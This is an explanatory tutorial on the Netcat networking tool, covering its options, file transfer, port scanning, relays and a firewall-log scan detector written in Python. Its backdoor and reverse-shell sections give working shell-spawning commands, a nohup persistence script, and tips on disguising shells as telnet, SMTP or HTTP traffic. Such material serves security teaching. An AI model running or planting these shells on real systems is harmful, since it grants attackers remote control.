Netcat

Hobbit wrote Netcat for Unix systems in 1996; in 1998 Weld Pond rewrote it for Windows. In simple terms, Netcat lets you read and write data across the network: it focuses on moving raw data between ports on systems, with no protocol logic of its own.

Netcat client

  • Client mode initiates a connection to a specific port on a target
  • Standard input is sent across the network
    • Input can come from the keyboard, be redirected from a file, or be piped from another application
  • All data received from the network is written to standard output
  • Errors are written to standard error
  • Supports source routing, which can be used for spoofing

Netcat Listen

  • Listen mode waits for an incoming connection on a specific port
  • All data received from the network is written to standard output
  • Standard input is sent across the network
  • Errors are written to standard error
  • The only difference is that clients initiate connections and listeners wait for them to arrive

Netcat commands
nc <options> <target system> <remote ports>

  • -l Listen mode
  • -L "Listen harder": keeps Netcat listening after a connection closes (Windows version only)
  • -u Use UDP instead of TCP
  • -p Local port (in client mode this is the source port)
  • -e Execute a program once the connection is established
  • -z Zero-I/O mode, used for scanning (connect, then close without sending data)
  • -w N Timeout: wait at most N seconds for a connection
  • -v Verbose output

Standard Shell redirects

  • > Redirect output to a file
  • < Read input from a file
  • | Pipe the output of the first program into the input of the second program

Uses for netcat

  • Data transfer
  • Port scanning and vulnerability scanning
  • Connecting to open ports
  • Backdoors
  • Relays

Netcat has a practically unlimited number of use cases. Use your imagination, and the possibilities are endless.

Data Transfer

  • Send files between machines
    • Listener -> Client
      • Listener: nc -l -p <port> < ./passwordFile.txt
      • Client: nc <listenerIP> <port> > passwordFile.txt
    • Client -> Listener
      • Listener: nc -l -p <port> > passwordFile.txt
      • Client: nc <listenerIP> <port> < ./passwordFile.txt
    • Works with TCP & UDP
    • Specify the expected source IP address on the listener to be stealthy and only accept connections from that source
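The client and listener behaviour described above (standard input goes out over the wire, whatever comes back goes to standard output) and the listener-to-client file transfer are easy to see with a few sockets. The following is an added example, not code from the page or from Netcat itself: a minimal listener and client on the loopback interface that move a constructed stand-in for passwordFile.txt and then compare SHA-256 digests on both ends, because a raw nc transfer gives you no integrity check at all. The `allowed_source` parameter is an assumption of this example and mirrors the advice to accept connections only from the expected source address.

```python
import hashlib
import socket
import threading
from typing import Dict, Optional, Tuple

# Constructed stand-in for the page's ./passwordFile.txt; the content is made up.
SAMPLE_FILE = b"alice:$6$saltsalt$notarealhash\nbob:$6$saltsalt$alsonotreal\n" * 40


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def listener_receive(result: Dict, ready: threading.Event,
                     allowed_source: Optional[str] = None) -> None:
    """Listener side (nc -l -p <port> > file): wait for one TCP connection and
    collect everything received into result["data"] until the peer sends EOF.
    If allowed_source is set, a connection from any other address is closed
    immediately without reading (assumption of this example)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", 0))            # port 0: let the OS pick a free port
        srv.listen(1)
        srv.settimeout(5)
        result["port"] = srv.getsockname()[1]  # tell the client where to connect
        ready.set()
        conn, peer = srv.accept()
        with conn:
            if allowed_source is not None and peer[0] != allowed_source:
                result["rejected"] = peer[0]
                return
            chunks = []
            while True:
                buf = conn.recv(4096)
                if not buf:                    # peer shut down its write side: EOF
                    break
                chunks.append(buf)
            result["data"] = b"".join(chunks)


def client_send(host: str, port: int, payload: bytes) -> None:
    """Client side (nc <listenerIP> <port> < file): connect, stream the bytes,
    then shut down the write half so the listener sees EOF, just as nc does
    when its redirected stdin is exhausted."""
    with socket.create_connection((host, port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)


def transfer_over_loopback(payload: bytes,
                           allowed_source: Optional[str] = None) -> Tuple[bytes, bool]:
    """Run listener and client in one process. Returns (received_bytes, ok),
    where ok is True only if the SHA-256 of what the listener stored matches
    the sender's bytes, the check a bare nc transfer never performs."""
    result: Dict = {}
    ready = threading.Event()
    t = threading.Thread(target=listener_receive,
                         args=(result, ready, allowed_source), daemon=True)
    t.start()
    ready.wait(5)
    try:
        client_send("127.0.0.1", result["port"], payload)
    except OSError:
        pass                                   # a rejected peer may get a reset mid-send
    t.join(5)
    received = result.get("data", b"")
    return received, sha256(received) == sha256(payload)


if __name__ == "__main__":
    data, ok = transfer_over_loopback(SAMPLE_FILE)
    print(f"received {len(data)} bytes, checksum match: {ok}")
    data, ok = transfer_over_loopback(SAMPLE_FILE, allowed_source="10.0.0.5")
    print(f"from an unexpected source: received {len(data)} bytes, accepted: {ok}")
```

On a real transfer the equivalent check is to run `sha256sum` on both machines after the nc session ends; the listener only knows the file is complete because the client closed its side, so a dropped connection silently leaves a truncated file behind.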

Port and Vulnerability scanning

  • TCP & UDP port scanning
    • Ports are scanned in order by default; use the -r option to randomize the order
      • nc -v -w3 -z <target IP> <startPort>-<endPort>
      • -v verbose output, -w3 don't wait more than 3 seconds per port
      • Can scan from any source port
      • Create a crude vulnerability scanner by sending data to each open port and recording the responses
      • Netcat ships with some helpful vulnerability-scanning scripts
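From the defender's side, a zero-I/O sweep like the one above leaves a distinctive trail: one source touching many distinct ports on one host in a short time, whether the ports were walked in order or shuffled with -r. The following detector is an added example and not part of the page; it parses constructed iptables-style log lines (the SRC/DST/PROTO/DPT field layout is an assumption) and flags any (source, destination, protocol) triple that hits at least `threshold` distinct ports inside a sliding `window_seconds` window. Keying on distinct-port count rather than sequential order is what makes it catch -r scans as well as linear ones.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Field layout of the constructed log lines below (assumption: your firewall logs
# ISO timestamp, host, and SRC=/DST=/PROTO=/DPT= fields in this shape).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) \S+ kernel: .*SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+) .*DPT=(?P<dport>\d+)"
)

Event = Tuple[datetime, str, str, str, int]


def parse_line(line: str) -> Optional[Event]:
    """Return (timestamp, src, dst, proto, dport) or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"],
            m["proto"], int(m["dport"]))


def find_port_sweeps(lines: List[str], threshold: int = 10,
                     window_seconds: int = 60) -> Dict[Tuple[str, str, str], int]:
    """Map (src, dst, proto) -> max number of distinct destination ports seen
    inside any window of window_seconds, for triples reaching the threshold."""
    events: Dict[Tuple[str, str, str], List[Tuple[datetime, int]]] = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            ts, src, dst, proto, dport = ev
            events[(src, dst, proto)].append((ts, dport))

    window = timedelta(seconds=window_seconds)
    hits: Dict[Tuple[str, str, str], int] = {}
    for key, evs in events.items():
        evs.sort()                         # by timestamp, then port
        counts: Dict[int, int] = {}        # port -> occurrences inside the window
        start, best = 0, 0
        for end, (ts, port) in enumerate(evs):
            counts[port] = counts.get(port, 0) + 1
            # Evict events that fell out of the trailing window.
            while evs[start][0] < ts - window:
                old_port = evs[start][1]
                counts[old_port] -= 1
                if counts[old_port] == 0:
                    del counts[old_port]
                start += 1
            best = max(best, len(counts))
        if best >= threshold:
            hits[key] = best
    return hits


# Constructed sample: 10.0.0.7 probes ports 20-31 in shuffled order within
# 12 seconds (the trail of `nc -r -w3 -z 10.0.0.20 20-31`), while 10.0.0.9
# makes two ordinary connections and one UDP packet and a junk line appear.
_SWEEP_PORTS = [25, 21, 30, 22, 27, 20, 31, 24, 29, 23, 28, 26]
SAMPLE_LOG = [
    f"2024-03-01T10:00:{i:02d} fw kernel: IN=eth0 SRC=10.0.0.7 DST=10.0.0.20 "
    f"PROTO=TCP SPT={44000 + i} DPT={p} SYN"
    for i, p in enumerate(_SWEEP_PORTS)
] + [
    "2024-03-01T10:00:05 fw kernel: IN=eth0 SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=51000 DPT=22 SYN",
    "2024-03-01T10:02:40 fw kernel: IN=eth0 SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=51001 DPT=80 SYN",
    "2024-03-01T10:03:10 fw kernel: IN=eth0 SRC=10.0.0.7 DST=10.0.0.20 PROTO=UDP SPT=44100 DPT=53",
    "not a firewall line at all",
]

if __name__ == "__main__":
    for (src, dst, proto), n in find_port_sweeps(SAMPLE_LOG).items():
        print(f"possible port sweep: {src} -> {dst}/{proto}, {n} distinct ports")
```

Tune `threshold` and `window_seconds` to the environment: a -w3 scan of a closed port range can take several seconds per port, so a scan of a few hundred ports will spread over many minutes and a 60-second window may need to grow accordingly.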

Connecting to open ports

The big question is: why not just use telnet? For starters, Netcat is faster than telnet, and when things go wrong you can quickly kill the connection with Ctrl+C. Netcat also handles raw binary data well and, unlike telnet, does not mix its own status messages into stdout. Netcat also supports UDP, which telnet does not.

Backdoors

Backdoors give attackers persistent access to your machine, and Netcat makes setting one up very simple:
Unix: nc -l -p <port> -e /bin/sh
Windows: nc -l -p <port> -e cmd.exe

Use the client to connect to the listener and start a shell prompt.

Netcat stops listening once the connection drops, so attackers need to do a few more things to keep the backdoor running.

In Windows you can use the -L flag to keep netcat listening.

In Unix based operating systems you will need to schedule a cron job or write a shell script.

touch backdoor.sh
nano backdoor.sh

insert the following code

echo "started";
nc -l -p <port> -e /bin/sh;

Ctrl+O to write out (save) the file
Ctrl+X to exit

After making the script readable and executable with chmod, launch it with nohup so it keeps running in the background even if the current user logs out.

chmod 555 backdoor.sh
nohup ./backdoor.sh

Reverse shells

A reverse shell turns the idea around: the client machine pushes its shell out to the attacker's listener. The client side could be triggered periodically through a cron job.
Listener: nc -l -p <port>
Client: nc <listenerIP> <port> -e /bin/sh

If the listener sits on a port such as 23, 25, or 80, a packet-filtering firewall may mistake this connection for legitimate telnet, SMTP, or HTTP traffic. In reality, the attacker has a full command shell on the internal system. A proxy firewall should notice that the expected application-layer protocol is not actually being spoken and drop the traffic.

Netcat Relays

Relays obscure the originating point of an attack. They can also redirect data through ports that the firewall allows.

The idea is to set up a listener and pipe its output into a client, which carries the data on to the next listener.

nc -l -p <port> | nc <targetServer> <outgoingPort>
nc -l -p 1111 | nc sheldyn 53142

Remember that on Unix systems you will need to use ports higher than 1023 if you do not have root (administrative) privileges.